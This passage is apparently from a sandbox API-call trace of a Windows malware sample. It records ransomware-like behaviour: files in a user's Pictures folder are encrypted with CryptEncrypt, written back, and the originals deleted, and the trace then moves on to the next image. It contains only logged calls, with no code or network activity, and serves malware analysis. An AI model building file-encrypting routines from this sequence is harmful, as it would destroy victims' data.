dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0088.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0088.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0088.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0088.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0088.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0088.061] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0088.061] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.061] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0088.061] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca4a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0088.062] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x19ab, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x19b0) returned 1 [0088.062] CharLowerBuffW (in: lpsz="byte[6577]", cchLength=0xa | out: lpsz="byte[6577]") returned 0xa [0088.062] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca898, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0088.062] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x451ad38*, pdwDataLen=0x144e790*=0x19ab, dwBufLen=0x19b0 | out: pbData=0x451ad38*, pdwDataLen=0x144e790*=0x19b0) returned 1 [0088.062] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0088.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0088.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.062] WriteFile (in: hFile=0x298, lpBuffer=0x45179c8*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x45179c8*, lpNumberOfBytesWritten=0x144f194*=0x19b0, lpOverlapped=0x0) returned 1 [0088.064] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0088.064] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.064] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0088.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca190, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0088.064] CryptDestroyKey (hKey=0x41ac6c0) returned 1 [0088.064] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0088.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0088.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.064] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0088.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0088.064] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0088.064] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.065] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0088.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0088.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0088.065] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0088.065] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0088.065] FreeLibrary (hLibModule=0x756e0000) returned 1 [0088.065] CloseHandle (hObject=0x258) returned 1 [0088.065] CloseHandle (hObject=0x298) returned 1 [0088.080] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\fW_IRtjvKhZB-.bmp", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\fW_IRtjvKhZB-.bmp", lpFilePart=0x0) returned 0x2a [0088.080] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\fW_IRtjvKhZB-.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\fw_irtjvkhzb-.bmp")) returned 0x20 [0088.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0088.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0088.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0088.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0088.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0088.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0088.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0088.080] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0088.080] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\fW_IRtjvKhZB-.bmp", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1c9ef0, ftCreationTime.dwHighDateTime=0x1d5e33b, ftLastAccessTime.dwLowDateTime=0x3d10c320, ftLastAccessTime.dwHighDateTime=0x1d5ed46, ftLastWriteTime.dwLowDateTime=0x3d10c320, ftLastWriteTime.dwHighDateTime=0x1d5ed46, nFileSizeHigh=0x0, nFileSizeLow=0x19ab, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="fW_IRtjvKhZB-.bmp", cAlternateFileName="FW_IRT~1.BMP")) returned 0x41ac540 [0088.081] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\fW_IRtjvKhZB-.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\fw_irtjvkhzb-.bmp")) returned 1 [0088.203] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1c9ef0, ftCreationTime.dwHighDateTime=0x1d5e33b, ftLastAccessTime.dwLowDateTime=0x3d10c320, ftLastAccessTime.dwHighDateTime=0x1d5ed46, ftLastWriteTime.dwLowDateTime=0x3d10c320, ftLastWriteTime.dwHighDateTime=0x1d5ed46, nFileSizeHigh=0x0, nFileSizeLow=0x19ab, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="fW_IRtjvKhZB-.bmp", cAlternateFileName="FW_IRT~1.BMP")) returned 0 [0088.203] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0088.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0088.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0088.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0088.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0088.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0088.203] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0088.204] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0088.204] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9660 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0088.204] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0088.204] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0088.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0088.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0088.204] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0088.204] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0088.204] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0088.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0088.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0088.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0088.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0088.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0088.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0088.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0088.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0088.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0088.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0088.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0088.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0088.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0088.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0088.205] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0088.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0088.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0088.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0088.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0088.205] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0088.206] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0088.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0088.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0088.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0088.206] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2270 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0088.206] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0088.206] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0088.206] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\GbOsv53gLsdhP15shLc.jpg", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4964680, ftCreationTime.dwHighDateTime=0x1d5eda8, ftLastAccessTime.dwLowDateTime=0xa9998330, ftLastAccessTime.dwHighDateTime=0x1d5ec95, ftLastWriteTime.dwLowDateTime=0xa9998330, ftLastWriteTime.dwHighDateTime=0x1d5ec95, nFileSizeHigh=0x0, nFileSizeLow=0xf65b, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="GbOsv53gLsdhP15shLc.jpg", cAlternateFileName="GBOSV5~1.JPG")) returned 0x41ac540 [0088.206] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0088.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0088.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0088.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0088.207] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0088.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0088.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0088.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d58 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0088.207] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0088.207] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0088.207] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0088.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0088.208] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0088.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0088.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0088.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2290 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0088.208] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0088.208] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 